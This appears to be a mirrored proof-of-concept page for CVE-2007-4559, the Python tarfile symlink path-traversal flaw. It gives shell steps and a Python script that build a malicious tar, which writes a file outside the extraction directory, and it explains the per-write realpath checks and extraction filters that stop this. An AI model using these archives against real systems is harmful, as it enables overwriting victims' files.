Related vulnerability
Title:
Path traversal vulnerability in the Python tarfile module
(CVE-2007-4559)
Description: Python is an open-source, object-oriented programming language from the Python Software Foundation; it is extensible, supports modules and packages, and runs on many platforms. The (1) extract and (2) extractall functions of the Python tarfile module contain a directory traversal vulnerability that allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in file names inside a TAR archive, a related issue to CVE-2001-1267.
Introduction
# demonstration of [CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559)
## what is this?
This is a demonstration of how Python's default handling of tar file extraction prior to Python 3.11.4 is vulnerable to a simple symlink attack. The instructions below describe how to craft a malicious payload. The script `untar.py` demonstrates how and why the extraction-filter feature added in 3.11.4 works, specifically why something like `os.path.realpath()` has to be invoked before every write, for every member. The script performs exactly the same inspection as the `extraction filter` feature in Python >= 3.11.4, except that it does not write the members to disk. That is enough to show the problem: `os.path.realpath()` can only resolve a symlink that already exists on the filesystem, so inspecting the whole archive up front, before anything has been written, lets a member that traverses a not-yet-created symlink be written outside the intended extraction directory. Note that the filters are opt-in (`filter='data'`); the default stayed the permissive `fully_trusted` behaviour until Python 3.14.
## what's here?
* instructions (this file) on how to set up the sandbox and the malicious tar file.
* python script `untar.py` that demonstrates the 'why' behind the recent implementation of enhanced tar validation in the python tarfile library. `os.path.realpath()` only resolves symlinks that already exist on the filesystem, so you can't rely on a single pass of `os.path.realpath()` over the member list to inspect tar member paths before extracting the archive: a member that traverses a symlink the archive itself creates looks safe until that symlink has been written. You must instead call `os.path.realpath()` before every write, for every member, so that links written earlier in the archive are resolved when later members are checked. See [PEP-706](https://peps.python.org/pep-0706/) and [tarfile doc](https://docs.python.org/3/library/tarfile.html#extraction-filters) for more information.
## create environment and malicious tar file
1. create test environment
```
snerd@jess:~$ mkdir -p lab/{lib,target}
```
2. add ./lib folder to tar archive
```
snerd@jess:~$ cd lab
snerd@jess:~/lab$ tar -cvPf terry.tar lib
```
3. replace ./lib directory with a symlink of the same name to "."
```
snerd@jess:~/lab$ rm -rf lib
snerd@jess:~/lab$ ln -s . lib
```
4. add symlink "lib" to archive
```
snerd@jess:~/lab$ tar -rvPf terry.tar lib
```
5. replace symlink "lib" with directory and file
```
snerd@jess:~/lab$ rm lib
snerd@jess:~/lab$ mkdir -p lib/lib
snerd@jess:~/lab$ touch lib/dangerous_file
```
6. add the file to the archive using a relative path (`-P` makes GNU tar keep the `..` component in the stored member name instead of refusing it)
```
snerd@jess:~/lab$ tar -rPvf terry.tar lib/lib/../dangerous_file
```
7. copy tar into target directory
```
snerd@jess:~/lab$ cp terry.tar target/
snerd@jess:~/lab$ cd target/
```
8. unpack the tar (`-P` again, so GNU tar does not sanitise the `..` component itself). `dangerous_file` is written outside the target directory, one level up in `~/lab`, because `lib` resolves to `.` once the symlink member has been extracted
```
snerd@jess:~/lab/target$ tar -xPvf terry.tar
lib/
lib
lib/lib/../dangerous_file
snerd@jess:~/lab/target$ ls
lib terry.tar
snerd@jess:~/lab/target$ ls ../
dangerous_file lib target terry.tar
```
## use python script
1. download `untar.py` from this repository and put it in the `./lab` directory
2. run the script. note how easy it is to fool `os.path.realpath()` when the malicious symlink has yet to be written to the target filesystem (if the `lib` symlink that step 8 left in `target/` is still there, `os.path.realpath()` will follow it and report `True`; remove it first to reproduce the output below)
```
snerd@jess:~/lab$ python3 untar.py
member name is: lib
dest_path is: /home/snerd/lab/target
target_path is: /home/snerd/lab/target/lib
is_tarslip? False
-*-*-*-*-
member name is: lib
dest_path is: /home/snerd/lab/target
target_path is: /home/snerd/lab/target/lib
is_tarslip? False
-*-*-*-*-
member name is: lib/lib/../dangerous_file
dest_path is: /home/snerd/lab/target
target_path is: /home/snerd/lab/target/lib/dangerous_file
is_tarslip? False
-*-*-*-*-
```
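As an added example (not the repository's `untar.py`, whose source is not reproduced on this page), the Python below builds an archive with the same two malicious members as steps 1-6, then runs the README's realpath check three ways: once over the whole member list before anything is written (the up-front inspection shown in the output above, which reports every member as safe), once immediately before each write (the 3.11.4+ approach, which catches `lib/lib/../dangerous_file` because the `lib -> .` symlink is on disk by then), and via the stdlib `filter='data'` where the interpreter has it. The function names, the omission of the harmless `lib/` directory entry, building the archive with `tarfile` instead of GNU `tar -P`, and the use of a temporary directory in place of `~/lab/target` are my choices; the check itself is the realpath-plus-commonpath comparison the stdlib filter applies to member names.

```python
"""Added example (not the repository's untar.py): a tar-slip check must run
before every write, not once over the member list before extraction."""
import io
import os
import tarfile
import tempfile

# True on interpreters with PEP 706 extraction filters (3.11.4+, 3.12+).
HAS_EXTRACTION_FILTERS = hasattr(tarfile, "data_filter")


def build_malicious_tar() -> bytes:
    """Constructed sample archive with the two members from the README's
    terry.tar that matter: a symlink `lib -> .` followed by a regular file
    whose stored path walks back through that symlink. The harmless `lib/`
    directory entry is left out."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("lib")
        link.type = tarfile.SYMTYPE
        link.linkname = "."
        tar.addfile(link)

        payload = b"owned\n"
        member = tarfile.TarInfo("lib/lib/../dangerous_file")
        member.size = len(payload)
        tar.addfile(member, io.BytesIO(payload))
    return buf.getvalue()


def is_tarslip(dest_path: str, name: str) -> bool:
    """The realpath + commonpath comparison the stdlib filters apply to a
    member name: the resolved target must stay under the resolved destination."""
    dest = os.path.realpath(dest_path)
    target = os.path.realpath(os.path.join(dest, name))
    return os.path.commonpath([dest, target]) != dest


def precheck_only(tar_bytes: bytes, dest_path: str) -> list:
    """Inspect every member before writing anything. The symlink is not on
    disk yet, so realpath() can only collapse '..' lexically and reports both
    members as safe. Nothing is written."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        return [(m.name, is_tarslip(dest_path, m.name)) for m in tar.getmembers()]


def extract_checking_each_write(tar_bytes: bytes, dest_path: str) -> list:
    """Re-run the same check immediately before each write. Once member 1 has
    been extracted the symlink exists, realpath() follows it, and member 2 is
    rejected before it can be written."""
    results = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar.getmembers():
            slip = is_tarslip(dest_path, m.name)
            results.append((m.name, slip))
            if slip:
                break  # refuse the member and stop; the archive is hostile
            if HAS_EXTRACTION_FILTERS:
                # Keep the stdlib filter out of the way: the manual check is
                # the only defence in this scenario.
                tar.extract(m, dest_path, filter="fully_trusted")
            else:
                tar.extract(m, dest_path)
    return results


def extract_with_stdlib_filter(tar_bytes: bytes, dest_path: str):
    """With PEP 706 filters, filter='data' does the per-member check itself.
    Returns the name of the rejected member, or None when this interpreter
    predates extraction filters (the archive is then not touched)."""
    if not HAS_EXTRACTION_FILTERS:
        return None
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        try:
            tar.extractall(dest_path, filter="data")
        except tarfile.FilterError as exc:
            return exc.tarinfo.name
    return "nothing rejected"


def demo() -> dict:
    """Run the three scenarios, each against a fresh <parent>/target, and
    record whether dangerous_file escaped into <parent>."""
    blob = build_malicious_tar()
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for label, fn in (("precheck", precheck_only),
                          ("per_write", extract_checking_each_write),
                          ("stdlib", extract_with_stdlib_filter)):
            parent = os.path.join(tmp, label)
            target = os.path.join(parent, "target")
            os.makedirs(target)
            results[label] = fn(blob, target)
            results[label + "_escaped"] = os.path.exists(
                os.path.join(parent, "dangerous_file"))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it with `python3` from any directory; it prints one line per result. On Python 3.12 and 3.13 the stdlib filters still have to be requested explicitly, as the last scenario does: `extractall()` without a `filter` argument only emits a DeprecationWarning and behaves as `fully_trusted`.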
## further reading
* [[Python-Dev] tarfile and directory traversal vulnerability](https://mail.python.org/pipermail/python-dev/2007-August/074290.html)
* [Alert: 15-year-old Python tarfile flaw lurks in 'over 350,000' code projects](https://www.theregister.com/2022/09/22/python_vulnerability_tarfile/)
* [SO post on how to safely extract tar archives prior to new features of python 3.11.4](https://stackoverflow.com/a/10077309)
* [python issue 21109](https://bugs.python.org/issue21109)
* [2022 statement from the long-time (retired 2019) maintainer of the tarfile library](https://www.gustaebel.de/lars/CVE-2007-4559.html)
* [implementation for the new extraction filter feature introduced in python 3.11.4](https://github.com/python/cpython/blob/17f994174de9211b2baaff217eeb1033343230fc/Lib/tarfile.py#L718)
File snapshot
[4.0K] /data/pocs/4cdb6f3f948fa313c2f5af639b883f2447688d9e
├── [1.0K] LICENSE
├── [4.2K] README.md
└── [ 958] untar.py
0 directories, 3 files
Notes
1. Accessing the original source is recommended.
2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.